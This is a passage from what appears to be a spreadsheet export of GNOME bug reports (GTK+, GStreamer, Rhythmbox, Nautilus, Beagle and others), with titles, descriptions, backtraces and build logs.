Connecting to daemon [  ###        ]
Connecting to daemon [   ###       ]
Connecting to daemon [    ###      ]
Connecting to 
evolution-alarm-notify-Message:  Sun Dec  2 00:00:00 2007
evolution-alarm-notify-Message:  Sat Dec  1 12:35:12 2007
Connecting to daemon [   ###       ]
Connecting to daemon [    ###      ]
Connecting to daemon [     ###     ]
Connecting to daemon [      ###    ]
Connecting to daemon [       ###   ]
Connecting to 
Connecting to daemon [    ###      ]
Connecting to daemon [   ###       ]
Connecting to daemon [  ###        ]
Connecting to daemon [ ###         ]
Connecting to daemon [###          ]
Connecting to 
Connecting to daemon [        ###  ]
Connecting to daemon [         ### ]
Connecting to daemon [          ###]
Connecting to daemon [         ### ]
Connecting to daemon [        ###  ]
Connecting to 
Connecting to daemon [   ###       ]
Connecting to daemon [  ###        ]
Connecting to daemon [ ###         ]
Connecting to daemon [###          ]
Connecting to daemon [ ###         ]
Connecting to 
Traceback (most recent call last):
  File /usr/lib/nautilus/extensions-1.0/python/NautilusSvn.py line 287 in get_background_items
    path = gnomevfs.get_local_path_from_uri(file.get_uri())
RuntimeError: unknown error
--------------------------------------------------
Traceback (most recent call last):
  File /usr/lib/python2.5/site-packages/deskbar/ui/cuemiac/CuemiacHistory.py line 45 in __get_action_title_for_cell
    text = action.get_verb () % action.get_escaped_name(text)
  File /usr/lib/python2.5/site-packages/deskbar/interfaces/Action.py line 27 in get_escaped_name
    for key value in self.get_name(text).items():
  File /usr/lib/python2.5/site-packages/deskbar/handlers/actions/OpenDesktopFileAction.py line 40 in get_name
    return {name: self._name prog: self._prog}
AttributeError: OpenDesktopFileAction instance has no attribute '_prog'</t>
  </si>
  <si>
    <t>warwick.adderley</t>
  </si>
  <si>
    <t>GTK+-67590</t>
  </si>
  <si>
    <t>Freeze in GtkPlug/GtkSocket</t>
  </si>
  <si>
    <t>Running the attached program focusing the button and pressing a key causes
the program to freeze.</t>
  </si>
  <si>
    <t>andersca</t>
  </si>
  <si>
    <t>GNOME-MAG-137105</t>
  </si>
  <si>
    <t>Must be able to specify source &amp; target displays once running</t>
  </si>
  <si>
    <t>Perhaps this might be considered a dup of 136089 or 135409 (which strongly
appear to be dups of eachother).  I leave that to the maintainer...  In any
case:
Presently the only want to specify the source and target display for the
magnifier is on the command line at startup.  As the expected way for
gnome-mag clients to invoke gnome-mag is via activation we need to have a
way to tell gnome-mag what the source &amp; target displays should be once
started.  Perhaps this might be done by introducing a new command-line
argument to gnome-mag which says don't start magnifiying yet (e.g. remain
largely un-initialized) and then new CORBA API to get it to start
magnifying with a specific source &amp; target.  Should also have API (if not
already present) for querying what the source &amp; target displays are.</t>
  </si>
  <si>
    <t>GNUMERIC-465509</t>
  </si>
  <si>
    <t>Writing your own Python functions manual page contains a syntax error</t>
  </si>
  <si>
    <t>On this page:
http://www.gnome.org/projects/gnumeric/doc/sect-extending-python-writing.shtml
the listing for my-func.py contains:
    from Gnumeric import GnumericError GnumericErrorVALUE
it should be
    from Gnumeric import GnumericError GnumericErrorVALUE
(added comma). The error prevents the example from working.
The only way to get a useful error message and spot errors in Python functions like this is to run gnumeric from the command line. I suggest adding a tip to that effect to the page also. Anybody who writes Python functions is gonna need to do it.
This email thread refers to the same error in the manual and the same solution: http://www.mail-archive.com/gnumeric-list@gnome.org/msg00527.html</t>
  </si>
  <si>
    <t>tchomby+gnomebugzilla</t>
  </si>
  <si>
    <t>GIMP-339124</t>
  </si>
  <si>
    <t>convmatrix has a problem.</t>
  </si>
  <si>
    <t>(convmatrix:16812): Gtk-CRITICAL **: gtk_toggle_button_set_active: assertion `GTK_IS_TOGGLE_BUTTON (toggle_button)' failed
Will look into this myself this afternoon.</t>
  </si>
  <si>
    <t>GNOME-SHELL-660397</t>
  </si>
  <si>
    <t>automountManager: Don't mount already-mounted volumes</t>
  </si>
  <si>
    <t>It's when restarting the shell to be pestered for stuff if I simply have
an audio CD or flash drive in my computer.</t>
  </si>
  <si>
    <t>GTK+-97404</t>
  </si>
  <si>
    <t>gtk_tree_store_move(): no way to move an iter to the position after the last iter at the same level</t>
  </si>
  <si>
    <t>gtk_tree_store_move(): no way to move an iter to the position after the
last iter at the same level.
You can move it _before_ every position. The last possible position is the
one before the last one at the level.
Try example from bug #97403 to reproduce.
I propose either to add a parameter to this function which says whether it
should move the iter before or after the specified path or replace the
function with gtk_tree_store_move_before() and gtk_tree_store_move_after().</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-162492</t>
  </si>
  <si>
    <t>garbage text in gnome-about-me strings</t>
  </si>
  <si>
    <t xml:space="preserve">#: capplets/about-me/gnome-about-me.glade.h:43
msgid asdfasdfasdfasdfasdf
msgstr 
#: capplets/about-me/gnome-about-me.glade.h:44
msgid gdsdfgsdfgsdfg
msgstr </t>
  </si>
  <si>
    <t>RHYTHMBOX-314290</t>
  </si>
  <si>
    <t>Compile Error with CVS HEAD</t>
  </si>
  <si>
    <t>gcc -DHAVE_CONFIG_H -I. -I. -I.. -DGNOMELOCALEDIR=\/usr/share/locale\
-DG_LOG_DOMAIN=\RhythmDB\ -I.. -I../lib -I../metadata -O2 -g -pipe -Wall
-Wp-D_FORTIFY_SOURCE=2 -fexceptions -fstack-protector --param=ssp-buffer-size=4
-m32 -march=i686 -mtune=pentium4 -fasynchronous-unwind-tables -DORBIT2=1
-pthread -I/usr/include/gtk-2.0 -I/usr/lib/gtk-2.0/include
-I/usr/include/atk-1.0 -I/usr/include/freetype2 -I/usr/include/cairo
-I/usr/include/pango-1.0 -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include
-I/usr/include/libgnomeui-2.0 -I/usr/include/libgnome-2.0
-I/usr/include/libgnomecanvas-2.0 -I/usr/include/libart-2.0
-I/usr/include/gconf/2 -I/usr/include/libbonoboui-2.0
-I/usr/include/gnome-vfs-2.0 -I/usr/lib/gnome-vfs-2.0/include
-I/usr/include/orbit-2.0 -I/usr/include/libbonobo-2.0
-I/usr/include/bonobo-activation-2.0 -I/usr/include/libxml2
-I/usr/include/libglade-2.0 -I/usr/include/gnome-vfs-module-2.0
-I/usr/include/totem/1/plparser -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
-pthread -DORBIT2=1 -I/usr/include/gstreamer-0.8 -I/usr/include/glib-2.0
-I/usr/lib/glib-2.0/include -I/usr/include/libxml2 -I/usr/include/gconf/2
-I/usr/include/orbit-2.0 -I/usr/X11R6/include -Wcomment -Wformat -Wnonnull
-Wimplicit-int -Wimplicit -Wmain -Wmissing-braces -Wparentheses -Wsequence-point
-Wreturn-type -Wswitch -Wtrigraphs -Wunused-function -Wunused-label
-Wunused-value -Wchar-subscripts -Wmissing-declarations -Wmissing-prototypes
-Wnested-externs -Wpointer-arith -Wcast-align -Werror -std=gnu89 -MT rhythmdb.lo
-MD -MP -MF .deps/rhythmdb.Tpo -c rhythmdb.c  -fPIC -DPIC -o
.libs/rhythmdb.occ1: warnings being treated as errors
rhythmdb.c: In function 'set_props_from_metadata':
rhythmdb.c:1033: warning: unused variable 'time'
make[3]: *** [rhythmdb.lo] Error 1
make[3]: Leaving directory
`/usr/src/redhat/BUILD/rhythmbox-0.9.0.99.200508231409/rhythmdb'
make[2]: *** [all] Error 2</t>
  </si>
  <si>
    <t>PANGO-395328</t>
  </si>
  <si>
    <t>Map kATSDeletedGlyphcode to PANGO_GLYPH_EMPTY</t>
  </si>
  <si>
    <t>As discussed in https://bugs.freedesktop.org/show_bug.cgi?id=9530 we need to handle kATSDeletedGlyphcode. Will attach a patch that maps it to PANGO_GLYPH_EMPTY which is already handled properly in pangocairo-atsui-font.c.
Btw do we need to add a component for the atsui backend?</t>
  </si>
  <si>
    <t>VTE-104558</t>
  </si>
  <si>
    <t>Arrow keys do not work consistently.</t>
  </si>
  <si>
    <t>Although arrow keys work fine in an xterm gnome-terminal outputs OA OB
OC and OD for the up down right and left arrows respectively in some cases:
1. First it seemed this happens only with non-Linux machines e.g. when
I run vim on Sun Solaris machines.In vim the arrow keys print A B C D
instead. Shell history browsing with the up-down arrow keys work as usual
though. Vim on Linux machines works correctly.
2. Then I discovered it happens on Linux too. One example is yacas
http://yacas.sourceforge.net/. Its shell-like history function simply does
not work and prints OA and OB for the up and down arrow keys. (Contrast
this with what happens when you type 'xterm -e yacas') I think I have come
across other (yet smaller) problems but I do not recall them because they
did not make you input a whole line.:-)
Thanks for the nice software.</t>
  </si>
  <si>
    <t>aydiner</t>
  </si>
  <si>
    <t>GSTREAMER-151661</t>
  </si>
  <si>
    <t>[PATCH] [mad] Possible bug in mad plugin</t>
  </si>
  <si>
    <t>Hi
I've got a problem when trying to decode a mp3 file (filesrc location=a.mp3 ! 
mad ! ...).  I've founded that the caps was'nt set correctly.  I think this 
problem come from the method use to recover from a MAD_ERROR_LOST_SYNC.
Actually when this happen and the data is a id3tag then mad_stream_skip is 
used to move at the and of the current tag and it is followed by a call 
to mad_stream_sync.
However I've founded that mad_stream_sync does'nt move the actual data 
pointer but only set an internal offset/skip value.   
So mad_stram_sync move the data pointer to the next frame and the next time 
you call mad_decode the offset will be applied.  Of course the position will 
now be wrong and will cause the decoder to return a sync error once again.
I think we should not call mad_stram_sync when mad_stream_skip has just 
been called.  OR mad_stream_skip should consider the skip/offset if there 
is one.</t>
  </si>
  <si>
    <t>francis_labonte</t>
  </si>
  <si>
    <t>GSTREAMER-100693</t>
  </si>
  <si>
    <t>playondemand parallel build broken</t>
  </si>
  <si>
    <t>when building the playondemand plugin for ppc the libgstplayondemand.la is
not built before the demo_mp3 binary needs it. 
not sure why it's not observable on x86.  just a strage race i suppose.
attaching a patch to fix this.</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-19545</t>
  </si>
  <si>
    <t>Screensaver selection in Control Centre crashed</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  control-center
Severity: normal
Version:  1.2.0
Synopsis: Screensaver selection in Control Centre crashed
Class:    sw-bug
Distribution: Linux Mandrake release 7.1 (helium)
System: Linux 2.2.15-4mdk i686 unknown
C library: glibc-2.1.3-5mdk
C compiler: 2.95.3
glib: glib-1.2.8-0mdk_helix_1
GTK+: gtk+-1.2.8-0mdk_helix_1
ORBit: ORBit-0.5.2-0mdk_helix_2
gnome-libs: gnome-libs-1.2.4-0mdk_helix_1
libxml: libxml-1.8.9-0mdk_helix_1
gnome-print: gnome-print-0.20-0mdk_helix_1
gnome-core: gnome-core-1.2.1-0mdk_helix_1
Description:
Opened Control centre and chose screensaver meny item -&gt; clicked no
screensaver -&gt; then after the system reported a crash
Debugging information:
(no debugging symbols found)...0x405f7d49 in wait4 () from /lib/libc.so.6
#0  0x405f7d49 in wait4 () from /lib/libc.so.6
#1  0x40658800 in ?? () from /lib/libc.so.6
#2  0x4015bd1a in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  0x402dad20 in gtk_signal_emit_by_name (object=) at gtksignal.c:618
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 16:34 -------
This bug was previously known as bug 19545 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=19545
Originally filed under the control-center product and general component.
Unknown version 1.2.x in product control-center. Setting version to the default unspecified.
The original reporter (fortis@takas.lt) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component bugmeister@canvas.gnome.org.
</t>
  </si>
  <si>
    <t>fortis</t>
  </si>
  <si>
    <t>GSTREAMER-142763</t>
  </si>
  <si>
    <t>make distcheck fails on Fedora Core 2</t>
  </si>
  <si>
    <t>head: cannot open `../../../docs/gst/../gstreamer-docs.sgml' for reading: No
such file or directory
/usr/bin/openjade:E: cannot find ../../../docs/gst/../gstreamer-docs.sgml
tried ../../../docs/gst/../gstreamer-docs.sgml
/usr/share/sgml/../../../docs/gst/../gstreamer-docs.sgml
/usr/bin/openjade:/usr/share/gtk-doc/data/gtk-doc.dcl:106:2:E: end of document
in prolog
make[4]: *** [html-build.stamp] Error 1
make[4]: Leaving directory
`/home/buildbot/gstreamer/build/gstreamer-0.8.1.1/_build/docs/gst'</t>
  </si>
  <si>
    <t>DOXYGEN-328435</t>
  </si>
  <si>
    <t>blank line in PDF makefile</t>
  </si>
  <si>
    <t>The Makefile generated in latex/Makefile for the case of generating
refman.pdf from refman.tex contains a blank line before the loop
that checks five times for a problem with running pdflatex.
Other information:
In doxygen 1.4.6 file src/latexgen.cpp line 189 two endl are
pushed to the output stream t where only one before the
latex_count=5 should be emitted. Since this goes into a makefile
each rule should start with tabs whereas the current implementation
emits a new line then a new line without a tab before continuing the
body of the make rule.</t>
  </si>
  <si>
    <t>mathar</t>
  </si>
  <si>
    <t>METATHEME-74580</t>
  </si>
  <si>
    <t>metatheme-edit</t>
  </si>
  <si>
    <t>METATHEME</t>
  </si>
  <si>
    <t>Crash on startup</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Metatheme
Severity: normal
Version: 0.9.4
Synopsis: Crash on startup
Bugzilla-Product: Metatheme
Bugzilla-Component: metatheme-edit
BugBuddy-GnomeVersion: 2.0 (1.112.1)
Description:
Description of Problem:
metatheme-edit crashed on startup
Steps to reproduce the problem:
1.  start metatheme-edit
2.  crash
3. 
Actual Results:
Expected Results:
How often does this happen?
every time
Additional Information:
Debugging Information:
[New Thread 1024 (LWP 22550)]
0x40934e29 in __wait4 () from /lib/libc.so.6
#0  0x40934e29 in __wait4 () from /lib/libc.so.6
#1  0x409b1050 in __DTOR_END__ () from /lib/libc.so.6
#2  0x402c38de in waitpid (pid=22553 stat_loc=0xbfffeecc options=0)
    at wrapsyscall.c:172
#3  0x400581b9 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:598
#4  0x402c14c7 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds =
43 __dsh = 0 edi = 134735520 esi = 0 ebp = 3221222008 esp =
3221222004 ebx = 1085658076 edx = 134744728 ecx = 0 eax = 134744728
trapno = 14 err = 4 eip = 1083188988 cs = 35 __csh = 0 eflags =
66182 esp_at_signal = 3221222004 ss = 43 __ssh = 0 fpstate =
0xbfffeff8 oldmask = 2147483648 cr2 = 0})
    at signals.c:97
#5  
#6  strcmp (p1=0x0 p2=0x0) at ../sysdeps/generic/strcmp.c:38
#7  0x40b56f79 in bg_ext_handler_get_config (handler=0x807e6a0)
    at bg-ext-handler.c:368
#8  0x40b56d6d in bg_ext_handler_get_arg (object=0x807e6a0 arg_id=1 
    value=0xbffff350 spec=0x807e2e0) at bg-ext-handler.c:330
#9  0x407bcf3f in g_object_get_valist (object=0x807e6a0 
    first_property_name=0x40b5b83c Color1 var_args=0xbffff3b8)
    at gobject.c:541
#10 0x407bd196 in g_object_get (_object=0x807e6a0 
    first_property_name=0x40b5b83c Color1) at gobject.c:977
#11 0x40b571ed in update_widgets (preview=0x81190c0) at
bg-config-gui.c:129
#12 0x40b57407 in set_ext_cb (gui=0x8119088 ext=0x8080a98
preview=0x81190c0)
    at bg-config-gui.c:174
#13 0x407ce825 in g_cclosure_marshal_VOID__OBJECT (closure=0x81222a0 
    return_value=0x0 n_param_values=2 param_values=0xbffff720 
    invocation_hint=0xbffff628 marshal_data=0x0) at gmarshal.c:636
#14 0x407b9012 in g_closure_invoke (closure=0x81222a0 return_value=0x0
    n_param_values=2 param_values=0xbffff720
invocation_hint=0xbffff628)
    at gclosure.c:437
#15 0x407ccf3f in signal_emit_unlocked_R (node=0x8118d50 detail=0 
    instance=0x8119088 emission_return=0x0
instance_and_params=0xbffff720)
    at gsignal.c:2340
#16 0x407cb6de in g_signal_emit_valist (instance=0x8119088
signal_id=169 
    detail=0 var_args=0xbffff8b0) at gsignal.c:2099
#17 0x407cb95b in g_signal_emit (instance=0x8119088 signal_id=169
detail=0)
    at gsignal.c:2143
#18 0x4087c58e in mtm_config_gui_set_ext (gui=0x8119088 ext=0x8080a98)
    at mtm-config-gui.c:308
#19 0x0804b5e0 in editor_page_new_from_ext (ext=0x8080a98) at
editor-page.c:252
#20 0x0804ad88 in editor_shell_new_from_theme (env=0x80781d8
theme=0x80798d8 
    parent_window=0x8092650) at editor-shell.c:74
#21 0x0804aa59 in main (argc=1 argv=0xbffff9d4) at main.c:77
#22 0x4089d306 in __libc_start_main (main=0x804a990  argc=1 
    ubp_av=0xbffff9d4 init=0x804a028  fini=0x804c8e0  
    rtld_fini=0x4000d2dc  stack_end=0xbffff9cc)
    at ../sysdeps/generic/libc-start.c:129
Thread 1 (Thread 1024 (LWP 22550)):
#0  0x40934e29 in __wait4 () from /lib/libc.so.6
#1  0x409b1050 in __DTOR_END__ () from /lib/libc.so.6
#2  0x402c38de in waitpid (pid=22553 stat_loc=0xbfffeecc options=0)
    at wrapsyscall.c:172
#3  0x400581b9 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:598
#4  0x402c14c7 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds =
43 __dsh = 0 edi = 134735520 esi = 0 ebp = 3221222008 esp =
3221222004 ebx = 1085658076 edx = 134744728 ecx = 0 eax = 134744728
trapno = 14 err = 4 eip = 1083188988 cs = 35 __csh = 0 eflags =
66182 esp_at_signal = 3221222004 ss = 43 __ssh = 0 fpstate =
0xbfffeff8 oldmask = 2147483648 cr2 = 0})
    at signals.c:97
#5  
#6  strcmp (p1=0x0 p2=0x0) at ../sysdeps/generic/strcmp.c:38
#7  0x40b56f79 in bg_ext_handler_get_config (handler=0x807e6a0)
    at bg-ext-handler.c:368
#8  0x40b56d6d in bg_ext_handler_get_arg (object=0x807e6a0 arg_id=1 
    value=0xbffff350 spec=0x807e2e0) at bg-ext-handler.c:330
#9  0x407bcf3f in g_object_get_valist (object=0x807e6a0 
    first_property_name=0x40b5b83c Color1 var_args=0xbffff3b8)
    at gobject.c:541
#10 0x407bd196 in g_object_get (_object=0x807e6a0 
    first_property_name=0x40b5b83c Color1) at gobject.c:977
#11 0x40b571ed in update_widgets (preview=0x81190c0) at
bg-config-gui.c:129
#12 0x40b57407 in set_ext_cb (gui=0x8119088 ext=0x8080a98
preview=0x81190c0)
    at bg-config-gui.c:174
#13 0x407ce825 in g_cclosure_marshal_VOID__OBJECT (closure=0x81222a0 
    return_value=0x0 n_param_values=2 param_values=0xbffff720 
    invocation_hint=0xbffff628 marshal_data=0x0) at gmarshal.c:636
#14 0x407b9012 in g_closure_invoke (closure=0x81222a0 return_value=0x0
    n_param_values=2 param_values=0xbffff720
invocation_hint=0xbffff628)
    at gclosure.c:437
#15 0x407ccf3f in signal_emit_unlocked_R (node=0x8118d50 detail=0 
    instance=0x8119088 emission_return=0x0
instance_and_params=0xbffff720)
    at gsignal.c:2340
#16 0x407cb6de in g_signal_emit_valist (instance=0x8119088
signal_id=169 
    detail=0 var_args=0xbffff8b0) at gsignal.c:2099
#17 0x407cb95b in g_signal_emit (instance=0x8119088 signal_id=169
detail=0)
    at gsignal.c:2143
#18 0x4087c58e in mtm_config_gui_set_ext (gui=0x8119088 ext=0x8080a98)
    at mtm-config-gui.c:308
#19 0x0804b5e0 in editor_page_new_from_ext (ext=0x8080a98) at
editor-page.c:252
#20 0x0804ad88 in editor_shell_new_from_theme (env=0x80781d8
theme=0x80798d8 
    parent_window=0x8092650) at editor-shell.c:74
#21 0x0804aa59 in main (argc=1 argv=0xbffff9d4) at main.c:77
#22 0x4089d306 in __libc_start_main (main=0x804a990  argc=1 
    ubp_av=0xbffff9d4 init=0x804a028  fini=0x804c8e0  
    rtld_fini=0x4000d2dc  stack_end=0xbffff9cc)
    at ../sysdeps/generic/libc-start.c:129
#0  0x40934e29 in __wait4 () from /lib/libc.so.6
#0  0x40934e29 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x409b1050 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x402c38de in waitpid (pid=22553 stat_loc=0xbfffeecc options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbfffeecc
options = 0
result = 0
oldtype = 0
#3  0x400581b9 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:598
598			eret = waitpid(pid 
estatus = 1076636234
in_segv = 1
pid = 0
#4  0x402c14c7 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds =
43 __dsh = 0 edi = 134735520 esi = 0 ebp = 3221222008 esp =
3221222004 ebx = 1085658076 edx = 134744728 ecx = 0 eax = 134744728
trapno = 14 err = 4 eip = 1083188988 cs = 35 __csh = 0 eflags =
66182 esp_at_signal = 3221222004 ss = 43 __ssh = 0 fpstate =
0xbfffeff8 oldmask = 2147483648 cr2 = 0})
    at signals.c:97
	in signals.c
self = 0x402ca460
in_sighandler = 0x0
self = 0x402ca460
in_sighandler = 0x0
#5  
No locals.
#6  strcmp (p1=0x0 p2=0x0) at ../sysdeps/generic/strcmp.c:38
	in ../sysdeps/generic/strcmp.c
s1 = (unsigned char *) 0x0
s2 = (unsigned char *) 0xbfffeecc J*@0
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-03-13 18:54 -------
Reassigning to the default owner of the component tvgm@ximian.com.
</t>
  </si>
  <si>
    <t>tvgm</t>
  </si>
  <si>
    <t>bloch</t>
  </si>
  <si>
    <t>NAUTILUS-40386</t>
  </si>
  <si>
    <t>Changing view then user level leads to core dump</t>
  </si>
  <si>
    <t xml:space="preserve">There seems to be something wrong with how the user level change interacts with
the state machine.
To reproduce:
	- start Nautilus
	- change the view mode (icon to list or vice versa)
	- open the Settings window
	- change the user level (expert to novice or vice versa)
You'll find yourself in the debugger.
------- Additional Comments From ramiro@fateware.com 2000-04-07 09:58:48 ----
yah i can get it to crash my doing view changes followed by user level changes
however not always in the same order.
marking assigned 4 hrs.
------- Additional Comments From sullivan@eazel.com 2000-09-08 15:26:37 ----
Setting all bugs to P6 to start official bug-prioritization plan. Please don't
set the priority to anything other than P6 unless you've got the gold seal of
approval for doing so.
------- Additional Comments From eli@eazel.com 2000-10-16 19:39:10 ----
Batch-assigning QA ownership of remaining bugs to eli@eazel.com
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:44 -------
</t>
  </si>
  <si>
    <t>RHYTHMBOX-352493</t>
  </si>
  <si>
    <t>Podcast</t>
  </si>
  <si>
    <t>Podcasts produce errors if no internet connection is available</t>
  </si>
  <si>
    <t>Please describe the problem:
When an internet connection is not available RB produces errors when trying to update podcasts one per.  Over a period of hours these can total up to over 100 error dialogs.  If one finds the right one you can begin to close them but otherwise the quickest way to get rid of them is to exit and restart RB which is only good until RB checks for updates again.
Steps to reproduce:
1. Disable the internet connection.
2. Let RB run with podcasts in the db.
3. Wait for the errors to pour in.
Actual results:
RB produces gobs of errors over a period of hours that are uncloseable.
Expected results:
I would expect that these errors would be suppressed and that RB would recognize that there is no connection available.
Does this happen every time?
Yes on the hour (my update interval).
Other information:
For what it's worth I was connected to my router during this time (valid IP address etc.) but my router was unable to connect to the internet.</t>
  </si>
  <si>
    <t>BEAGLE-340542</t>
  </si>
  <si>
    <t>Lock obtain timed out</t>
  </si>
  <si>
    <t>Again :-(
Warn: Exception caught while executing Beagle.Daemon.ConnectionHandler:Void HandleConnection()
Warn: System.IO.IOException: Lock obain timed out: /home/lukas/.beagle/Indexes/EvolutionMailIndex/Locks/lucene-f2fa73df3f0925f6f51ab464522f138a-write.lock -- pid  -- process exists
in [0x0010e] (at /home/lukas/cvs/beagle/beagled/Lucene.Net/Store/Lock.cs:91) Lucene.Net.Store.Lock:Obtain (Int64 lockWaitTimeout)
in [0x00039] (at /home/lukas/cvs/beagle/beagled/Lucene.Net/Index/IndexReader.cs:547) Lucene.Net.Index.IndexReader:AquireWriteLock ()
in [0x00014] (at /home/lukas/cvs/beagle/beagled/Lucene.Net/Index/IndexReader.cs:576) Lucene.Net.Index.IndexReader:Delete (Int32 docNum)
in [0x0001f] (at /home/lukas/cvs/beagle/beagled/Lucene.Net/Index/IndexReader.cs:605) Lucene.Net.Index.IndexReader:Delete (Lucene.Net.Index.Term term)
in [0x000a4] (at /home/lukas/cvs/beagle/beagled/LuceneIndexingDriver.cs:126) Beagle.Daemon.LuceneIndexingDriver:Flush_Unlocked (Beagle.Daemon.IndexerRequest request)
in [0x0000f] (at /home/lukas/cvs/beagle/beagled/LuceneIndexingDriver.cs:90) Beagle.Daemon.LuceneIndexingDriver:Flush (Beagle.Daemon.IndexerRequest request)
in [0x00079] (at /home/lukas/cvs/beagle/beagled/IndexHelper/RemoteIndexerExecutor.cs:69) Beagle.IndexHelper.RemoteIndexerExecutor:Execute (Beagle.RequestMessage raw_request)
in [0x00232] (at /home/lukas/cvs/beagle/beagled/Server.cs:275) Beagle.Daemon.ConnectionHandler:HandleConnection ()
in (wrapper delegate-invoke) System.MulticastDelegate:invoke_void ()
in [0x0005a] (at /home/lukas/cvs/beagle/Util/ExceptionHandlingThread.cs:54) Beagle.Util.ExceptionHandlingThread:ThreadStarted ()
Debug: Helper Size: VmRSS=22.7 MB size=2.04 26.0%</t>
  </si>
  <si>
    <t>lukaslipka</t>
  </si>
  <si>
    <t>EPIPHANY-662059</t>
  </si>
  <si>
    <t>Downloads</t>
  </si>
  <si>
    <t>downloads: make sure useful icons are used for downloads</t>
  </si>
  <si>
    <t>Asking for the mime-type when the downloads start usually gives a wrong value.
The practical effect of this is that a PDF can have a text icon or a package icon and when clicked it's opened with Evince since GIO correctly detects the mime-type.
To solve this we add ephy_download_get_content_type API to get the mime-type of a download either with Soup or GIO.
I'm not sure if we should ask Soup at all since it gets its first reading from web-server (not to be trusted) and later readings from GIO (so it seems).
So maybe we want to directly ask GIO always.
Also I'm not minding that the GIcon is updated with every call to widget_progress_cb because it shouldn't really be a big deal since we are not working with GdkPixbufs or similar. AFAIK GIcon is a very lightweight thing.
Side-note: e-download: directly use the WebKitDownload member is a trivial one liner.</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-13097</t>
  </si>
  <si>
    <t>mahjongg</t>
  </si>
  <si>
    <t>mahjongg crashed</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-games
Severity: normal
Version: 0.99.2+
&gt;Synopsis: mahjongg crashed
&gt;Class: sw-bug
Distribution: Red Hat Linux release 6.2 (Zoot)
System: Linux 2.2.14-6.1.1 i686 unknown
C library: glibc-2.1.3-15
C compiler: egcs-2.91.66
glib: 1.2.6
GTK+: 1.2.6
ORBit: ORBit 0.5.0
gnome-libs: gnome-libs 1.0.55
gnome-core: gnome-core-1.0.55-12
&gt;Description:
Gnome Mahjongg crashed when I accidentally hit the Shuffle button when
there were
no more tiles displayed.
&gt;How-To-Repeat:
Solve a round of Mahjongg then select Shuffle
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 16:32 -------
This bug was previously known as bug 13097 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=13097
Originally filed under the gnome-games product and general component.
The original reporter (klmitch@localhost.localdomain) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component bugmeister@canvas.gnome.org.
</t>
  </si>
  <si>
    <t>klmitch</t>
  </si>
  <si>
    <t>SAWFISH-67601</t>
  </si>
  <si>
    <t>Starting sawfish breaks drag-and-drop in Gtk</t>
  </si>
  <si>
    <t>There seems to be a slight problem with windows created before sawfish
is loaded:
- Start an application that supports drag-and-drop (eg gnome-terminal)
  without any window manager loaded.
- Load sawfish.
- Try dragging to the application. It isn't sensitive to drops because
  the window with the XdndAware property isn't a top-level window AND
  it doesn't have the WM_STATE property set. Windows created after
  sawfish is loaded have this property set and work correctly.
I'm not sure whether this is a bug in sawfish or gtk+.
Thanks</t>
  </si>
  <si>
    <t>PYGTK-308835</t>
  </si>
  <si>
    <t>TextBuffer docs should explicitly identify TextIter parameters</t>
  </si>
  <si>
    <t>maybe elsewhere but I talk about: class-gtktextbuffer.html</t>
  </si>
  <si>
    <t>kourem</t>
  </si>
  <si>
    <t>NAUTILUS-432529</t>
  </si>
  <si>
    <t>Sidebar</t>
  </si>
  <si>
    <t>line displayed to the bookmark sidebar when dnd a non-directory icon</t>
  </si>
  <si>
    <t>The bug has been described on https://bugs.launchpad.net/ubuntu/+source/nautilus/+bug/73031
...
http://librarian.launchpad.net/7353254/Bildschirmfoto-synaptics-0.14.6%20-%20Datei-Browser.png
Ok it seems the bug is still there in feisty. On the image attached you see what it looks like after hovering an icon over the sidebar.
Though this bug is not that important i agree i think it should be fixed for cosmetic reasons (probably gtk bug?)
...
'nvidia' that is but to me it doesn't look so much like a video driver bug. Especially not since it doesn't happen if i drag a folder.
...</t>
  </si>
  <si>
    <t>BEAGLE-349934</t>
  </si>
  <si>
    <t>Newest Glib commits break build</t>
  </si>
  <si>
    <t>I'm getting this little beauty when I attempt to compile Dunno if its my fault but it doesn't seem like it so I'm making it a blocker.
